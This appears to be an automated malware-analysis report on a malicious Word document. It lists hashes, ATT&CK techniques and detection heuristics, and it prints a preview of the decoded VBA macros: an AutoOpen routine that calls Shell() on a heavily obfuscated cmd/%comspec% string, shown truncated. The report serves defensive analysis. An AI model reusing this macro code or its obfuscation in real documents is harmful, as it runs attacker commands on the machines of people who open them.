Office (OLE) malware analysis — malicious · 57a51ec57f2e6f98

MALICIOUS

Office (OLE)

83.2 KB Created: 2018-06-03 17:54:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 34f01151c8a309c3e2c199d8382f9660 SHA-1: bc3329a4943dbb6ac314fd8fcd5a38151a6e8698 SHA-256: 57a51ec57f2e6f988cc144d14ac4ea62fb79da485a612a0399a0eee09b371006

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro is present and triggers the execution of the UoUUzMqFXcI function, which uses the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The specific command executed by Shell() is obfuscated but includes concatenation of strings that are not fully resolvable from the provided snippet.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15319 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15319 bytes
SHA-256: `01a926dfb272f814608b67007d0aab385d83c2873e4b2cea9d1b804da55b6d4f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zZwAfEv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function UoUUzMqFXcI() On Error Resume Next For JnMJt = QaWBtj To 78571 pJHkfP = (GLbduI - ChrW(56846 * 63566) * NIEit * CInt(sRqhT + Sqr(1779)) + 40461 - 75525 / 19745 - CDate(MsOSCu - 81798 + 90742 - Hex(Dclfz / 65674)) + (tVolfG * Tan(SQquwv))) Next For lYRmiP = OwTRJ To 37507 uHmqwh = (zzZLF - ChrW(3896 * 93069) * LAszR * CInt(EUsQS + Sqr(45753)) + 59465 - 44247 / 40751 - CDate(WnAYJ - 8366 + 6519 - Hex(OplZsb / 55789)) + (SMnSZ * Tan(BXpnt))) Next UoUUzMqFXcI = ZiqMRQZR + Shell(oEmEJMi + Chr(kBiBqw + vbKeyC + MXzbUimakZ) + AbvnCNRaIh + vbTSnTQv + KUwPvt + SGrcZszu + dbwDu + WhEHHW + ETvzXXwPH, oAiGHnmjjj + 0 + PozHumadW) For jJccdF = SBYsHw To 86773 cjfcQn = (FSjCu - ChrW(24283 * 71457) * iVKdSF * CInt(JvmmK + Sqr(23635)) + 88728 - 39046 / 60802 - CDate(jZZqK - 22027 + 55096 - Hex(cEKsbL / 54257)) + (YqWwTa * Tan(PWkpid))) Next End Function Sub Autoopen() On Error Resume Next For LwEfNn = lXKiq To 80962 CRTbK = (nEzjCF - ChrW(88227 * 20246) * aWwJk * CInt(MnvzoV + Sqr(74470)) + 35096 - 22858 / 27700 - CDate(kiMFQO - 37298 + 99806 - Hex(HAVdI / 87501)) + (Rzojh * Tan(IpdXd))) Next UoUUzMqFXcI For HAlmU = VPzOJ To 15214 JflMSS = (vVUUXi - ChrW(91314 * 59127) * Xbskz * CInt(DVOADn + Sqr(57501)) + 6223 - 5862 / 77425 - CDate(EXZWdL - 10619 + 78500 - Hex(mfROpi / 81342)) + (amQXhQ * Tan(QwRPBR))) Next End Sub Attribute VB_Name = "RjqaXEztQ" Function AbvnCNRaIh() On Error Resume Next For NmrBd = FPhIU To 6339 mVjfa = (jBhvoG - ChrW(33084 * 27646) * VUamVj * CInt(PWmYcs + Sqr(17073)) + 22734 - 73025 / 95258 - CDate(jmCWs - 6355 + 88239 - Hex(UfrCuM / 21793)) + (tNhih * Tan(AFMsCC))) Next ktjwhZvf = "md c" + "BmQcIow" + "zT iWBPmKV" + "FhjwQKjw" + "LMnCJ jXDkHH" + "jTJYzI & " + " %^c^" + "o^m^S^p^E^" + "c^% %^c" + "^o^m^S^" For sVJrCh = qzbXsZ To 30074 YUsLQ = (PwEOWw - ChrW(71983 * 94697) * ABqHb * CInt(iLsij + Sqr(43169)) + 88126 - 71368 / 18264 - CDate(HXvhrz - 81362 + 73081 - Hex(dWEcj / 71645)) + (tpbWBS * Tan(vpJzhh))) Next dhnQSDaS = "p^E^" + "c^" + "% /" + "V " For VNvYO = qPSAK To 9419 wniiLt = (dDJmop - ChrW(67929 * 99244) * iAJEzH * CInt(IDSMA + Sqr(56535)) + 45802 - 51071 / 22869 - CDate(TpILao - 76031 + 80211 - Hex(RDIjYp / 82162)) + (jABAz * Tan(dVfthr))) Next zDkSudCI = " /c " + " s" + "et %cXB" + "IVjvBnuwFVFv%=" + "djLRGAnd&&" + "set %in" + "DtNVrFOSIRsf" For jjasVt = jHLVOT To 80559 ATtWJ = (oZKvU - ChrW(98265 * 58713) * vvGwjl * CInt(hrDwz + Sqr(84304)) + 53694 - 79010 / 61323 - CDate(fAYULz - 20023 + 65239 - Hex(sJQwBu / 24451)) + (MQPQnE * Tan(TcqaKN))) Next tTAXKX = "%=p&&set " + "%CTLs" + "Kdbhk%=o^w" + "&&set %LCDO" + "VOTHwIiIvCq%=GI" + "uobzOB&&set" + " %fXBFDwZErS" + "YXDK%=!%inDtNV" + "rFOSIRsf" For kiJow = WjvvQ To 72211 LQuCBm = (PYQWs - ChrW(93194 * 75835) * jJjXj * CInt(YmnMwG + Sqr(37237)) + 56629 - 39838 / 37354 - CDate(BLZCh - 77677 + 47880 - Hex(LwMNn / 92165)) + (SUzmM * Tan(ENmiGp))) Next XdOZfiJ = "%!&&s" + "et %MXqaNj" + "BbkXzT" + "chf%=bpGNXm" + "RasE&&set %" For jjlDz = qlNzB To 39905 AViMY = (Qunwd - ChrW(65707 * 13928) * zznXa * CInt(TrcLIQ + Sqr(33270)) + 10061 - 31412 / 9881 - CDate(zRBsj - 58861 + 49622 - Hex(GYLsk / 15556)) + (pNtna * Tan(bVrItX))) Next jwoKufNOfS = "vUnibPR%" + "=e" + "^r&&se" + "t " + "%jPblDHX" + "R%=!%" + "CTLsKdb" + "hk%!&&set %f" + "PliUCELwEji" AbvnCNRaIh = ktjwhZvf + dhnQSDaS + zDkSudCI + tTAXKX + XdOZfiJ + jwoKufNOfS End Function Function vbTSnTQv() On Error Resume Next For HjLii = fQFPNS To 26214 UaHwr = (maDLc - ChrW(59565 * 87137) * wJjpG * CInt(wXMhJ + Sqr(12415)) + 54644 - 10459 / 69244 - CDate(fUMKGu - 68435 + 18958 - Hex(USjfz / 3064)) + (kIUwf * Tan(LsSwN))) Next OBWpLmPT = "z ... (truncated)

SHA-256: 01a926dfb272f814608b67007d0aab385d83c2873e4b2cea9d1b804da55b6d4f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zZwAfEv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UoUUzMqFXcI()
On Error Resume Next
For JnMJt = QaWBtj To 78571
         pJHkfP = (GLbduI - ChrW(56846 * 63566) * NIEit * CInt(sRqhT + Sqr(1779)) + 40461 - 75525 / 19745 - CDate(MsOSCu - 81798 + 90742 - Hex(Dclfz / 65674)) + (tVolfG * Tan(SQquwv)))
Next
For lYRmiP = OwTRJ To 37507
         uHmqwh = (zzZLF - ChrW(3896 * 93069) * LAszR * CInt(EUsQS + Sqr(45753)) + 59465 - 44247 / 40751 - CDate(WnAYJ - 8366 + 6519 - Hex(OplZsb / 55789)) + (SMnSZ * Tan(BXpnt)))
Next
UoUUzMqFXcI = ZiqMRQZR + Shell(oEmEJMi + Chr(kBiBqw + vbKeyC + MXzbUimakZ) + AbvnCNRaIh + vbTSnTQv + KUwPvt + SGrcZszu + dbwDu + WhEHHW + ETvzXXwPH, oAiGHnmjjj + 0 + PozHumadW)
For jJccdF = SBYsHw To 86773
         cjfcQn = (FSjCu - ChrW(24283 * 71457) * iVKdSF * CInt(JvmmK + Sqr(23635)) + 88728 - 39046 / 60802 - CDate(jZZqK - 22027 + 55096 - Hex(cEKsbL / 54257)) + (YqWwTa * Tan(PWkpid)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For LwEfNn = lXKiq To 80962
         CRTbK = (nEzjCF - ChrW(88227 * 20246) * aWwJk * CInt(MnvzoV + Sqr(74470)) + 35096 - 22858 / 27700 - CDate(kiMFQO - 37298 + 99806 - Hex(HAVdI / 87501)) + (Rzojh * Tan(IpdXd)))
Next
UoUUzMqFXcI
For HAlmU = VPzOJ To 15214
         JflMSS = (vVUUXi - ChrW(91314 * 59127) * Xbskz * CInt(DVOADn + Sqr(57501)) + 6223 - 5862 / 77425 - CDate(EXZWdL - 10619 + 78500 - Hex(mfROpi / 81342)) + (amQXhQ * Tan(QwRPBR)))
Next
End Sub


Attribute VB_Name = "RjqaXEztQ"
Function AbvnCNRaIh()
On Error Resume Next
For NmrBd = FPhIU To 6339
         mVjfa = (jBhvoG - ChrW(33084 * 27646) * VUamVj * CInt(PWmYcs + Sqr(17073)) + 22734 - 73025 / 95258 - CDate(jmCWs - 6355 + 88239 - Hex(UfrCuM / 21793)) + (tNhih * Tan(AFMsCC)))
Next
ktjwhZvf = "md c" + "BmQcIow" + "zT iWBPmKV" + "FhjwQKjw" + "LMnCJ jXDkHH" + "jTJYzI &   " + "  %^c^" + "o^m^S^p^E^" + "c^%     %^c" + "^o^m^S^"
For sVJrCh = qzbXsZ To 30074
         YUsLQ = (PwEOWw - ChrW(71983 * 94697) * ABqHb * CInt(iLsij + Sqr(43169)) + 88126 - 71368 / 18264 - CDate(HXvhrz - 81362 + 73081 - Hex(dWEcj / 71645)) + (tpbWBS * Tan(vpJzhh)))
Next
dhnQSDaS = "p^E^" + "c^" + "%     /" + "V     "
For VNvYO = qPSAK To 9419
         wniiLt = (dDJmop - ChrW(67929 * 99244) * iAJEzH * CInt(IDSMA + Sqr(56535)) + 45802 - 51071 / 22869 - CDate(TpILao - 76031 + 80211 - Hex(RDIjYp / 82162)) + (jABAz * Tan(dVfthr)))
Next
zDkSudCI = "    /c " + "          s" + "et %cXB" + "IVjvBnuwFVFv%=" + "djLRGAnd&&" + "set %in" + "DtNVrFOSIRsf"
For jjasVt = jHLVOT To 80559
         ATtWJ = (oZKvU - ChrW(98265 * 58713) * vvGwjl * CInt(hrDwz + Sqr(84304)) + 53694 - 79010 / 61323 - CDate(fAYULz - 20023 + 65239 - Hex(sJQwBu / 24451)) + (MQPQnE * Tan(TcqaKN)))
Next
tTAXKX = "%=p&&set " + "%CTLs" + "Kdbhk%=o^w" + "&&set %LCDO" + "VOTHwIiIvCq%=GI" + "uobzOB&&set" + " %fXBFDwZErS" + "YXDK%=!%inDtNV" + "rFOSIRsf"
For kiJow = WjvvQ To 72211
         LQuCBm = (PYQWs - ChrW(93194 * 75835) * jJjXj * CInt(YmnMwG + Sqr(37237)) + 56629 - 39838 / 37354 - CDate(BLZCh - 77677 + 47880 - Hex(LwMNn / 92165)) + (SUzmM * Tan(ENmiGp)))
Next
XdOZfiJ = "%!&&s" + "et %MXqaNj" + "BbkXzT" + "chf%=bpGNXm" + "RasE&&set %"
For jjlDz = qlNzB To 39905
         AViMY = (Qunwd - ChrW(65707 * 13928) * zznXa * CInt(TrcLIQ + Sqr(33270)) + 10061 - 31412 / 9881 - CDate(zRBsj - 58861 + 49622 - Hex(GYLsk / 15556)) + (pNtna * Tan(bVrItX)))
Next
jwoKufNOfS = "vUnibPR%" + "=e" + "^r&&se" + "t " + "%jPblDHX" + "R%=!%" + "CTLsKdb" + "hk%!&&set %f" + "PliUCELwEji"
AbvnCNRaIh = ktjwhZvf + dhnQSDaS + zDkSudCI + tTAXKX + XdOZfiJ + jwoKufNOfS
End Function
Function vbTSnTQv()
On Error Resume Next
For HjLii = fQFPNS To 26214
         UaHwr = (maDLc - ChrW(59565 * 87137) * wJjpG * CInt(wXMhJ + Sqr(12415)) + 54644 - 10459 / 69244 - CDate(fUMKGu - 68435 + 18958 - Hex(USjfz / 3064)) + (kIUwf * Tan(LsSwN)))
Next
OBWpLmPT = "z
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.